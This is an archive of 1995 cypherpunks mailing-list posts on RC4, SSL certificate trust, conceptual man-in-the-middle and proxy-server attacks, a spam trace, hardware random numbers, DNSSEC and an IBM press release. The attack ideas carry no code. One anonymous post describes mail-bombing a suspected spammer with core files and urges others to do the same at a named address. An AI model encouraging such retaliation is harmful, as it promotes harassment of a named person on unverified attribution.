genkey - Generate RSA keys.

This package is similar to pgp, but the algorithms are more transparent, and
the key size is unlimited.  It uses a C++.

I wrote all of this code myself and I will give it away to whomever wants it.

I am planning on using it to write an encrypted mail system.

If you want this code I will e-mail it to you in uuencode format.


- --
Send comp.os.linux.announce submissions to: linux-announce@news.ornl.gov
PLEASE remember a short description of the software.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMG1OyIQRll5MupLRAQFHeAP9GO7IJSu0eqWbnVKWUSk/RQZU+5jwRuEv
U1TzLaRZO4F5GXG3E4awx0RonuDtOeOZ/wCls7MONlk3JP0YigpxY23jA3pbfUhx
5JdbVYrbdNm5yi18GlRgsGdhkzIyTXPB7s/F2tUAxC80fxC85LM7O1RFINRrgUrc
QDIOmJNZVMM=
=Q9w9
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@cic.net>
Date: Sun, 1 Oct 95 00:36:51 PDT
To: baldwin@RSA.COM
Subject: Re: RSA's comments on RC4 weak keys
In-Reply-To: <199510010537.AAA09694@alpha.jpunix.com>
Message-ID: <199510010736.DAA09592@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun Oct  1 01:37:01 1995: you scribbled...
> 
> Robert W. Baldwin <baldwin@RSA.COM> wrote:
> 
> > Here is our response to the excellent work that Andrew Roos has been
> > doing on RC4.  I am glad that people are looking at RC4 critically.

Hi.  This is a pretty intresting statement.  

Does this mean that RSA acknowledges the fact that RC4 can no longer claim
"Trade Secret" status, and therefore will stop trying to make people get a
license to use RC4?

Thanx.

...alex...


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Alex Tang <altitude@umich.edu> or Alex Tang <altitude@cic.net>

iQCVAwUBMG5E9qNd+TOtm9v5AQGWbAP9EtKLfLsz5Vw1ltkyFxhFoTGCBmxngMzg
wlNQfDJ4Qp52HwKnVZGUgxeYYzH5SNT5xRnYzjITUd6tRBI5SRO+/5DQYYLcT1/N
GXYqT7nZ5R5+SXd4XGDmzqNweW42E0HD4QPpc1Qmr+QxoCpmFb9WJZ6Onh++rAu7
abH3sNIWQsk=
=FZer
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@alpha.c2.org (Anonymous)
Date: Sun, 1 Oct 95 09:18:27 PDT
Subject: Re: WHERE did this come from?
In-Reply-To: <44kgtb$88i@news.rain.org>
Message-ID: <199510010427.VAA28730@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <44kgtb$88i@news.rain.org>,  <rivaud@rain.org> wrote:
>
>Attatched to this is, (I hope), the header text from a unsolicited e-mail 
>message I received.  The return address does not work.  WHY? How can I 
>inform the sender that I hope to never receive there material again?
>
>I tried "reply-all" through Eudora, but my reply got bounced back to me 
>as undeliverable.
>
>I have removed the content of the original message. I don't know why it 
>was sent to me, but it contained material that I found offensive.
>
>Any help, or words of wisdom and enlightenment would be appreciated. 
>Information would be nice too.  

[...]

>Return-Path: Crusader@national-alliance.org Received: from asso.nis.garr.it (asso.nis.garr.it [192.12.192.10]) by coyote.rain.org (8=
>6.12/CSE) with SMTP id FAA20270; Sat, 30 Sep 1995 05:58:42 -0700 From: Crusader@national-alliance.org
>Received: by asso.nis.garr.it (4.1/1.34/ABB950929)
>	id AA14320; Sat, 30 Sep 95 13:02:20 +0100 Received: by mercury.sfsu.edu (5.0/SMI-SVR4) 
>	id AA21676; Sat, 30 Sep 95 03:43:27 -0700 Date: Sat, 30 Sep 95 03:43:27 -0700
>Message-Id: <91324721788@National-Alliance.org> Subject: The Long March 
>Apparently-To: Crusader@National-Alliance.org
>
>
>If you are concerned about the fate Western/American civiliztion and its people, please take the time to read this artcle.

[remainder of political rant deleted]


I got it too.  It was a pretty good forgery, but the web pages mentioned
seem to be owned by treborle@netcom.com.  It looks like a hit-and-run spam,
as he hasn't logged in for awhile.  But since netcom charges for disk space,
I took the liberty of mailing him a few uuencoded core files. :)  You might
want to send a few to his compuserve address too for good measure. 
(73323.603@compuserve.com)

It looks like their web site www.natvan.com got taken out already, tho they
still have the netcom one.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: VMARX@ix.netcom.com (Vincent Marx )
Date: Sun, 1 Oct 95 10:04:45 PDT
Subject: Re: WHERE did this come from?
In-Reply-To: <44kgtb$88i@news.rain.org>
Message-ID: <44leli$s38@ixnews6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In <44kgtb$88i@news.rain.org> rivaud@rain.org writes: 
>
>This is a multi-part message in MIME format.
>
>---------------------------------17921121372935
>Content-Transfer-Encoding: 7bit
>Content-Type: text/plain; charset=us-ascii
>
>Attatched to this is, (I hope), the header text from a unsolicited
e-mail 
>message I received.  The return address does not work.  WHY? How can I

>inform the sender that I hope to never receive there material again?
>
>I tried "reply-all" through Eudora, but my reply got bounced back to
me 
>as undeliverable.
>
>I have removed the content of the original message. I don't know why
it 
>was sent to me, but it contained material that I found offensive.
>
>Any help, or words of wisdom and enlightenment would be appreciated. 
>Information would be nice too.  
>

I got the SAME dammed letter.  I don't know who the facist bastard is
that sent it to me, but I sent him a reply ALSO telling him to stop
sending it to me (he sent me 3 copies) and I couldn't connect to his
server.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jmrubin@ix.netcom.com (Joel Rubin)
Date: Sun, 1 Oct 95 10:23:06 PDT
Subject: Re: WHERE did this come from?
In-Reply-To: <44kgtb$88i@news.rain.org>
Message-ID: <44lh9u$qoh@ixnews7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <44leli$s38@ixnews6.ix.netcom.com>, VMARX@ix.netcom.com 
says...
>
>In <44kgtb$88i@news.rain.org> rivaud@rain.org writes: 
>>
>>This is a multi-part message in MIME format.
>>
>>---------------------------------17921121372935
>>Content-Transfer-Encoding: 7bit
>>Content-Type: text/plain; charset=us-ascii
>>
>>Attatched to this is, (I hope), the header text from a unsolicited
>e-mail 
>>message I received.  The return address does not work.  WHY? How can I
>
>>inform the sender that I hope to never receive there material again?
>>
>>I tried "reply-all" through Eudora, but my reply got bounced back to
>me 
>>as undeliverable.
>>
>>I have removed the content of the original message. I don't know why
>it 
>>was sent to me, but it contained material that I found offensive.
>>
>>Any help, or words of wisdom and enlightenment would be appreciated. 
>>Information would be nice too.  
>>
>
>I got the SAME dammed letter.  I don't know who the facist bastard is
>that sent it to me, but I sent him a reply ALSO telling him to stop
>sending it to me (he sent me 3 copies) and I couldn't connect to his
>server.
>
There was a posting allegedly from a Harvey S. Cohen at AT&T on 
soc.culture.jewish to the effect that the "Long March" email is, in 
fact, a fraud intended to get the National Alliance in trouble. (a noble 
cause if not necessarily appropriate means)

I don't know if this is connected but I notice that a "let's use these 
big lie tactics on Usenet" posting allegedly from the National 
Alliance's Compuserve address seems to have somehow gone through the 
University of Pennsylvania.

     "Things are seldom what they seem.
      Skim milk masquerades as cream."

                                William S. Gilbert (H.M.S. Pinafore)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 1 Oct 95 10:19:44 PDT
To: Don Stephenson <Don.Stephenson@Eng.Sun.COM>
Subject: Re: NetScape's dependence upon RSA down for the count!
In-Reply-To: <9510010614.AA08538@icenine.Eng.Sun.COM>
Message-ID: <Pine.SOL.3.91.951001101443.5437A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 30 Sep 1995, Don Stephenson wrote:

> I don't think binding hostnames to certificates helps much because 
> both hostnames and IP addresses can be spoofed and DNS servers can be 
> subverted.  The important thing is the binding to the "service" name or 

In this particular case, hostnames do help, because they are information 
imbedded in the url used to access the server. By verifying the hostname 
in the certificate with the hostname in the url, you can state with a 
high degree of confidence that the object retrieved is precisely the 
desired object covered by this url. 

> Well of course, if the secret key of the server (or worse yet, certificate 
> authority) is compromised, all bets are off.  That's true of just about any 
> protocol you can dream up.

I'm not referring to the secret key of _the_ server; I'm referring to the 
secret key of _ANY_ server. In the limiting case, such a key can be 
obtained by buying one from the CA. 

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 1 Oct 95 10:26:10 PDT
To: Brian Mancuso <brianm@cs.bu.edu>
Subject: Re: WWW Proxy Server Vulnerabilities
In-Reply-To: <199510011708.NAA29261@csa.bu.edu>
Message-ID: <Pine.SOL.3.91.951001102636.5437B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


PRoxy servers are just an easy way to implement a demonstration attack. 
Fortunately, they are also a way to improve security, as long as you can 
set one up on a machine to which you have a relatively trusted path 
(localhost)

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edgar@highnrg.sbay.org (Edgar Swank)
Date: Sun, 1 Oct 95 11:26:52 PDT
To: Cypherpunks          <cypherpunks@toad.com>
Subject: SecureDrive News - Win95, non-USA ftp sites
Message-ID: <BqZacD15w165w@highnrg.sbay.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have received the following information about running SecureDrive
1.4 with Win95, thanks to Ed Stone,

    This is what I sent to a person who asked how to use secdrive on
    win95......

    >>>>>>>>>>>>>>>>>>>>>inserted text follows
    Try this:

    in your autoexec.bat file enter this, using your path to secdrive:

    C:\your-path-to-secdrive\SECTSR
    C:\your-path-to-secdrive\LOGIN your-encrypted-disk-letter: /S
    C:\your-path-to-secdrive\login your-encrypted-disk-letter:

    During normal win95 startup, you will be asked to enter your
    passphrase. Now when 95 come up, the tsr is running, your passphrase
    has been entered, and everything operates as if the disk is not
    encrypted. EXCEPT.... the tsr you have loaded (sectsr) makes windows
    load real-mode drivers for the disk, instead of protected mode
    drivers. This will make disk access somewhat slower, but not a big
    deal. When you startup win95 and you don't need to use secdrive,
    just hit enter when the boot process asks for your passphrase, and
    it will behave as if you entered a "wrong passphrase" and that drive
    will not be visible to win95, and protected mode drivers will
    load...

    Hope this helps.

In particular that the normal drivers will load even with sectsr
resident if the correct passphrase isn't entered is new and valuable
information.

I have also just learned that SecureDrive 1.4 is now available on some
non-USA (and so not export-controlled) ftp sites,

    ftp://utopia.hacktic.nl/pub/disk/secdr14.zip
    ftp://ftp.ox.ac.uk/pub/crypto/misc/secdr14.zip

I have verified that the hacktic file is an exact copy of the zip I
released in the USA.

Edgar W. Swank   <edgar@HighNRG.sbay.org>
SecureDrive Co-author

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMG2BIt4nNf3ah8DHAQH49AP/YzmRhOLk+JdPx3emgWxv7vcX/2e7KR/Y
WK0p1hiPUAHDsG3ZEd3fD+DZyILxq0oJcQSsrdtsAFiSnw955i/g+XsGFVT8UGku
YzTXB4LXnJE4IqA2qd8aUKU9xk9S57xN1p+xrLlEK2jJrFMg+h9cPMp1a0lwivvP
Ff2lF1+lthI=
=DYRV
-----END PGP SIGNATURE-----

---
edgar@HighNRG.sbay.org
Keep Freestyle Alive!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sun, 1 Oct 95 10:25:46 PDT
To: jbass@dmsd.com (John L. Bass)
Subject: Re: MITM attacks, the day after ...
In-Reply-To: <9510011649.AA12871@dmsd.com>
Message-ID: <199510011740.KAA01644@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


 
> There seem at this point to be two messenger or man in the middle attacks
> on SSL that have enough merit to explore further.
> 
> #1  Attack client binaries to suppress certificate validation, and accept
> ones forged by the filter/MITM. The binary attack could occur during down
> load from NetScape (a good ISP level attack) or after the fact with a virus.
> The client binary would be normally functioning with servers other than the
> attacking MITM filter.

That's not an attack on SSL.   It's an attack on an application.
It's no different, conceptually, than attacking sendmail or MS Word.

The point to attacking SSL is to be able to decode a message from any
browser, without having to do anything extraordinary to the victim's host.
No cryptosystem is proof against an attacker who can see and
control everything you do on the client side (i.e. has root in UNIX
parlance).

So, while your idea #1 might be interesting or fun to do as far as computer
security goes, it's not an attack on SSL. 

> #2  Present client with the filters valid certificate and hope that in the
> rare case the user looks, that they will not question it, or even know what
> a valid one from the real server is.

That points out the flaw in Netscape's authentication model that
others have already pointed out on this list.  Admittedly, like Don
Stephenson just posted, there's not really a good way to distribute
and authenticate certificates until there's a ubiquitous global
CA chain.



-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Sun, 1 Oct 95 09:50:03 PDT
To: www-security@ns2.rutgers.edu
Subject: MITM attacks, the day after ...
Message-ID: <9510011649.AA12871@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain



I suppose C2 got as many "do you know how hard it is" complaints as
I have, or more. But dispite that, several people broke keys.

There seem at this point to be two messenger or man in the middle attacks
on SSL that have enough merit to explore further.

#1  Attack client binaries to suppress certificate validation, and accept
ones forged by the filter/MITM. The binary attack could occur during down
load from NetScape (a good ISP level attack) or after the fact with a virus.
The client binary would be normally functioning with servers other than the
attacking MITM filter.

#2  Present client with the filters valid certificate and hope that in the
rare case the user looks, that they will not question it, or even know what
a valid one from the real server is.

Since detection is possible in both of these, attack only a few percent of the
traffic until the heat is on, then lay dormant or move to a different site.

Suggested to me this morning was taking a harder look proxy servers.

John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sun, 1 Oct 95 10:42:01 PDT
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: NetScape's dependence upon RSA down for the count!
In-Reply-To: <Pine.SOL.3.91.951001101443.5437A-100000@chivalry>
Message-ID: <199510011756.KAA01707@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


 
> On Sat, 30 Sep 1995, Don Stephenson wrote:
> 
> > I don't think binding hostnames to certificates helps much because 
> > both hostnames and IP addresses can be spoofed and DNS servers can be 
> > subverted.  The important thing is the binding to the "service" name or 
> 
> In this particular case, hostnames do help, because they are information 
> imbedded in the url used to access the server. By verifying the hostname 
> in the certificate with the hostname in the url, you can state with a 
> high degree of confidence that the object retrieved is precisely the 
> desired object covered by this url. 

Assume that the attacker Mallet is in the middle and has control of the http
stream.  Alice clicks on 'open Widget order form' to order a Widget
and Mallet sends her browser a redirect pointing to his evil web server.
Alice doesn't notice that the hostname in the url has changed, or
if she does, she figures that the catalog people have arranged to
have Mallet's server host their 'secure' transactions (not an unreasonable
assumption).  Mallet takes the order and pockets the money.
The hostname in the certificate (Mallet's) matches the hostname
in the URL (also Mallet's).

Of course this isn't really an attack on SSL per se.  It's an attack on
the certificate-granting policy- the CA gave a certificate to
an unscrupulous person (Mallet).

> 
> > Well of course, if the secret key of the server (or worse yet, certificate 
> > authority) is compromised, all bets are off.  That's true of just about any 
> > protocol you can dream up.
> 
> I'm not referring to the secret key of _the_ server; I'm referring to the 
> secret key of _ANY_ server. In the limiting case, such a key can be 
> obtained by buying one from the CA. 

Right. That's what I pointed out in an earlier message, although I
didn't elaborate on it.   The security of Netscape browsers depends
on Verisign's policy in handing out server certificates.


Backing up for a minute, the same problem holds for those neeto
credit-card readers that Visa and MasterCharge give out to merchants.
The merchant can be a crook setting up a 'store-front' operation to charge
to bogus/stolen card numbers, or the employees can steal using the numbers
they get in the corse of doing business, etc.  There are already
procedures in place for dealing with this sort of crime.  I'm not
sure that tricking Verisign into giving out a certificate to a group
of crackers is really any different than tricking Visa into giving
a card reader to a group of theives.

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 1 Oct 95 12:25:51 PDT
To: cypherpunks@toad.com
Subject: Re: WHERE did this [NOISE] come from?
Message-ID: <199510011925.MAA17193@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:38 PM 9/30/95 GMT, you wrote:
>Attatched to this is, (I hope), the header text from a unsolicited e-mail 
>message I received.  The return address does not work.  WHY? How can I 
>inform the sender that I hope to never receive there material again?
>
>I tried "reply-all" through Eudora, but my reply got bounced back to me 
>as undeliverable.
>
>I have removed the content of the original message. I don't know why it 
>was sent to me, but it contained material that I found offensive.
>
>Any help, or words of wisdom and enlightenment would be appreciated. 
>Information would be nice too.  

Well, at the bottom of the post, it listed contact info at:

>National Alliance can also be reached at:
>
>WORLD WIDE WEB: http://www.natvan.com (if unavailable, try our ftp site)
>FTP SITE: ftp.netcom.com, path /pub/NA/NA

(I find it funny that they go through the trouble of forging an e-mail
address yet they give ftp and web sites at the end of the page.)

Hopefully that bit of targeting information will be of some use...
|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brianm@cs.bu.edu (Brian Mancuso)
Date: Sun, 1 Oct 95 10:09:39 PDT
To: cypherpunks@toad.com
Subject: WWW Proxy Server Vulnerabilities
Message-ID: <199510011708.NAA29261@csa.bu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Regarding WWW SSL middle-man attacks,

John L. Bass writes:
: Ok, several people have asked:
: 
: client ->   filter                          Client sends packet with K(c)
:             filter ->       Server          filter forwards packet with K(f)
:             filter       <- Server          Server sends encrypts with K(f)
: client   <- filter                          filter re-encrypts with K(c)
: 
: hacking a DMS server is one way, spoofing a DNS reply to named is easier,
: simply packaging the filter into a router/bridge close to the server
: is more effective ... even if hacking the incoming phoneline/T1 line
: to the server and inserting a very transparent bridge AKA a phone tap.
: 

Consider the following attack: Many organizations, especially ones with low
bandwidth localnet-to-internet connections and those with firewalls, have
implemented `proxy-servers' to retrieve documents from the outside world
and cache them for fast future localnet access. ALL WEB TRAFFIC FROM THE
LOCALNET TO THE INTERNET GOES THROUGH THESE PROXY SERVERS, transparently
to the client and web servers after the client has been configured to do
so.

If one of these servers were to be compromised, an attacker could easily
implement the the middle-man scheme described above. Note that proxy
servers are fairly common (especially since firewalls require them),
so the apparatus already exists for the middle-man attack outside of
modifying DNS servers and routers.

The irony of the situation is that it is the most secure organizations
who have implemented firewalls that are the most vulnerable to the
middle-man attack.

Brian Mancuso

Boston University Computer Science Dept.  PGP DF FA C0 EF 51 B0 23 54
Tel: 617.352.6552 Net: brianm@cs.bu.edu   KFP 5C 8D E0 50 C6 39 C6 0F



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Sun, 1 Oct 95 12:18:16 PDT
To: cypherpunks@toad.com
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <199510011820.OAA27233@frankenstein.piermont.com>
Message-ID: <199510011918.NAA22758@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Perry writes, regarding alpha decay counts for random numbers:

> And, as I noted, there are RS232 interfaceable radiation detectors you
> can buy off the shelf -- no hardware hacking needed.

As far as a radiation source goes, the Americium 241 source from a cheap
smoke detector is just dandy. A while ago, I took one into the lab and
put it on a scintillating counter and got alpha hits at roughly 
half-microsecond intervals. It was a while ago, so I forget how this compared
to the rating in Curies on the package. But that would be fine for a
low-to-moderate bandwidth RNG.

                                    -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Sun, 1 Oct 95 12:29:19 PDT
To: cypherpunks@toad.com
Subject: Quantum Crypto: Anecdote
Message-ID: <199510011929.NAA29289@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Given the regularity with which fears of factoring by quantum compters comes
up around here, I thought I'd share a brief story:

At a party last night, I ran into a couple of acquantances, and was 
delighted to learn that they are working on the current NIST quantum computing
project, making quantum gates out of atomic traps similar to those used
by Cornell and Weiman to get a Bose condensate with Rubidium (crypto relevance
comes from odd places, eh?) Anyway, I talked them up a bit, and so far they've
managed to construct a working "or" gate. The long-term project is to construct
a quantum computer capable of factoring 15, which they expect to take at
least several years.

I mentioned crypto and they literally laughed at me. The word from the 
trenches is "don't worry about it for a very long time."

                                   -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Sun, 1 Oct 95 12:39:05 PDT
To: cypherpunks@toad.com
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <199510011918.NAA22758@bogart.Colorado.EDU>
Message-ID: <199510011938.NAA04391@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



I write:

> put it on a scintillating counter and got alpha hits at roughly 
> half-microsecond intervals.
  ^^^^^^^^^^^^^^^^

Um, sorry about that. That's half _millisecond_ intervals. What's three 
orders of magnitude between friends?

As long as I'm correcting myself, I just sent another message with subject
"Quantum Crypto..." which should have been "Quantum Computing..."

Sigh. Sundays.

                                 -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William.Soley@Eng.Sun.COM (William Soley)
Date: Sun, 1 Oct 95 13:44:42 PDT
To: cypherpunks@toad.com
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <199510012043.NAA06905@illilouette.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, Oct 1 1995, Simon Spero wrote:

> On Sat, 30 Sep 1995, Don Stephenson wrote:
>
> > I don't think binding hostnames to certificates helps much because 
> > both hostnames and IP addresses can be spoofed and DNS servers can be 
> > subverted.  The important thing is the binding to the "service" name or 
> 
> In this particular case, hostnames do help, because they are information 
> imbedded in the url used to access the server. By verifying the hostname 
> in the certificate with the hostname in the url, you can state with a 
> high degree of confidence that the object retrieved is precisely the 
> desired object covered by this url. 
> 
Hostnames help only a little.  Often the host name belongs to the ISP that
is providing the server resources.  For example when I ordered sushi last
night from WOW, the URL was "https://www.ird.net/[...]wow[...]", but the
certificate was issued to "www.sunnyside.com" (as displayed by the
File->DocumentInformation menu item in Netscape):

Version: 00
Serial Number: 02:72:00:00:3C
Issuer:  C=US, O=RSA Data Security, Inc., OU=Secure Server Certification Authority
Subject: C=US, ST=California, L=Palo Alto, O=Sunnyside Computing, Inc., OU=Internet Services, CN=www.sunnyside.com


PROBLEMS:

(1) The certificate *was* issued with a host name in the CN field, but it
did not match the host name in the URL and my browser did not care to warn
me of this discrepency (I had to manually request to see the certificate
and check it myself -- not a likely precaution for Joe Sixpack).

(2) Even if the certificate did match the URL (and my browser did check it)
I still have no way to know that "Sunnyside Computing" or "sunnyside.com" or
"ird.net" is actually the authentic/official ISP for WOW and not an imposter
or MITM.

(3) Netscape is making the problem worse (yes, worse) in the next release
by allowing the user to specify their own list of trusted CAs.  (I will
elaborate on this unpopular view below.)


NON-PROBLEMS:

(1) SSL did its job.  It is only a session layer.  It assured the application
that a secure session was established with the entity named in the certificate.

(2) The sushi was very good.  :-)


DISCUSSION:

Re: problem 2, it would be better to have the certificate issued with
the subject ... O=Waiters on Wheels ... CN=www.ird.net ... so that the
browser can automatically check it against the URL and the user can be
assured that (assuming suitable CA policy) ird.net is an
authentic/official ISP for WOW.  I think the browser should check the
CN and hostname in the URL and display a popup warning if they do not
match, and (optionally but by default) display a popup whenever a new
session is started with a different certificate -- and of course show
the certificate.  This is not perfect, of course, its just better.

Re: problem 3, about how allowing the user to specify their own list of
trusted CAs is bad.  All it takes is for any web page to put up text
like ...  "Dear Joe Sixpack, in order to assure your privacy while
viewing these naughty pictures you must add the following certificate
to your such-and-such file ..." and Joe Sixpack will be happy to do
it.  Even Mary Moderately-Savy might be tricked in to doing it on the
false assumption that it would only affect security for the naughty
pictures site (that she may not care about), and not affect security for
her stock-broker.  This false assumption might be based on the fact
that the (legitimate) stock-broker uses a different CA.

-Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald E. Eastlake 3rd" <dee@cybercash.com>
Date: Sun, 1 Oct 95 11:01:44 PDT
To: isig@netf.org
Subject: DNS Security ( was Re: NetScape's dependence upon RSA down...)
Message-ID: <Pine.SUN.3.91.951001135411.12454J-100000@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


DNS security is an important point.  People not aware of efforts in this
area may want to check out draft-ietf-dnssec-secext-05.txt which has
more or less passed working group last call and is being considered by
th Security Area Directory / IESG.  Reference code is also available
(see message pasted at end below).

Donald
=====================================================================
Donald E. Eastlake 3rd     +1 508-287-4877(tel)     dee@cybercash.com
   318 Acton Street        +1 508-371-7148(fax)     dee@world.std.com
Carlisle, MA 01741 USA     +1 703-620-4200(main office, Reston, VA)

================================

Date: Mon, 11 Sep 1995 10:24:28 -0400
From: James M Galvin <galvin@TIS.COM>
To: dns-security@TIS.COM
Subject: ANNOUNCEMENT: TIS/DNSSEC Version 1.2 alpha

A new version of TIS/DNSSEC is now available.  This version is
distinguished from the previous version as follows.

        in sync with bind Beta26
        uses RSAREF

For information on how to acquire TIS/DNSSEC retrieve the file
/pub/DNSSEC/README on the host ftp.tis.com via anonymous FTP.

If you have any questions or problems please send a note to
tisdnssec-support@tis.com.

Enjoy,

Jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Sun, 1 Oct 95 14:13:56 PDT
To: cypherpunks@toad.com
Subject: IBM enters WWW security market
Message-ID: <199510012109.OAA00353@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> -------- Forwarded message --------
> Newsgroups: comp.os.os2.announce
> Date: Fri, 29 Sep 1995 14:49:59 GMT
> From: tsipple@vnet.IBM.COM
> Subject: OS/2 NEWS:  New, secure version of WebExplorer
> 
> Submitted by:   Timothy F. Sipples (tsipple@vnet.ibm.com)
> Source:         Timothy F. Sipples (tsipple@vnet.ibm.com)
> Date received:  1995 September 26
> Date posted:    1995 September 29
> ------------------------------------------------------------------------------
> New, secure version of WebExplorer for OS/2 Warp
> 
> ATLANTA, Sept. 27, 1995--The latest additions to IBM's Internet
> Connection software family will enable companies to encrypt
> Internet transactions and better protect internal networks with
> firewall software as they explore new business opportunities on
> the Information Superhighway.
> 
> Today's announcements include:
> 
>     * A new secure version of the Web Explorer for OS/2 Warp
> 
>     * The IBM Internet Connection Secure Server for OS/2 Warp
> 
>     * The Internet Connection Secure Server for AIX
> 
>     * An enhanced version of the Internet Connection Secured
>       Network Gateway
> 
>     * an enhanced version of the Internet Connection for OS/2
>       Warp
> 
>     * an enhanced version of the Internet Connection for Windows
> 
> "Businesses of all kinds are considering the immense opportunity
> the Internet offers but are reluctant to take the plunge until
> they feel they can do so in a planned, secure manner.  The
> Internet Connection family provides our customers with that
> reassurance, freeing them to explore a whole new world of
> possibilities," said Lois Dimpfel, vice president, Networking
> Software Products, IBM Networking Software Division.
> 
> The Internet is evolving as a means for conducting electronic
> commerce, and the new IBM secure servers and OS/2 Warp client are
> superbly positioned to meet customer security needs.  The IBM
> Internet Connection servers and client support both of the
> emerging security technologies -- Secure Hypertext Transfer
> Protocol (S-HTTP) and Secure Sockets Layer (SSL) -- to provide
> customers with maximum flexibility.
> 
> New OS/2 Warp client and secure servers
> 
> The new version of the Internet Connection for OS/2 Warp, the
> first Internet client to be included at no charge in an operating
> system, adds security support to an Internet application suite
> that has won generous praise in its first year of availability.
> OS/2 Magazine recently chose the Internet Connection for OS/2
> Warp as a winner in its editors' choice awards.
> 
> The Internet Connection family of client software was also
> enhanced last week.  The Internet Connection for OS/2 Warp,
> provided at no charge as part of the Warp bonus pack, now
> includes table support, streaming graphics, an integrated news
> function and other enhancements through HyperText Markup Language
> (HTML) 3.0 extensions.  These enhancements will also be available
> in the secure version being announced today.
> 
> The InternetConnection for Windows was enhanced with improved
> performance, additional graphic viewers, audio players and other
> features.
> 
> IBM's new web server software provides unmatched scalability for
> customers.  The OS/2 Warp version can run on cost-effective
> desktop systems sold in retail outlets, while the AIX version
> runs on highly-scalable RISC System/6000 platforms.
> 
> Both the IBM Internet Connection Secure Server for OS/2 Warp and
> the Internet Connection Secure Server for AIX were designed to be
> quickly and easily configured using any industry-standard
> browser.  The installation and configuration is menu-based and
> includes online help designed to assist an administrator with
> making the correct choice.
> 
> The new Internet Connection secure servers and clients allow
> businesses and their customers to conduct transactions over the
> 'Net knowing that the data is protected.  For example, an auto
> parts supplier might create a secure web server containing its
> catalog, including high-quality images of the items, on the web
> along with the ability to place an order.  A customer would use
> the Internet Connection secure client -- or an S-HTTP- or
> SSL-compliant client from another vendor -- to browse the
> online catalog, order a part and pay for it with an encrypted
> credit card number.
> 
> Enhanced secured network gateway
> 
> A new version of IBM's Secured Network Gateway, a software
> product generally known as an Internet "firewall," today joins
> the Internet Connection product family.  Formerly part of the
> NetSP product family, the Secured Network Gateway operates on an
> AIX platform to protect a corporation's internal enterprise
> network resources from Internet intruders, while allowing
> legitimate traffic to flow through the firewall.
> 
> The Internet Connection Secured Network Gateway offers a number of
> advanced features, including: proxy server, SOCKS servers, filters and
> domain name service.
> 
> Among several features added to the new version is support for
> AIX version 4.13, in addition to AIX version 3.25.  The new
> operating system support offers customers the option to run the
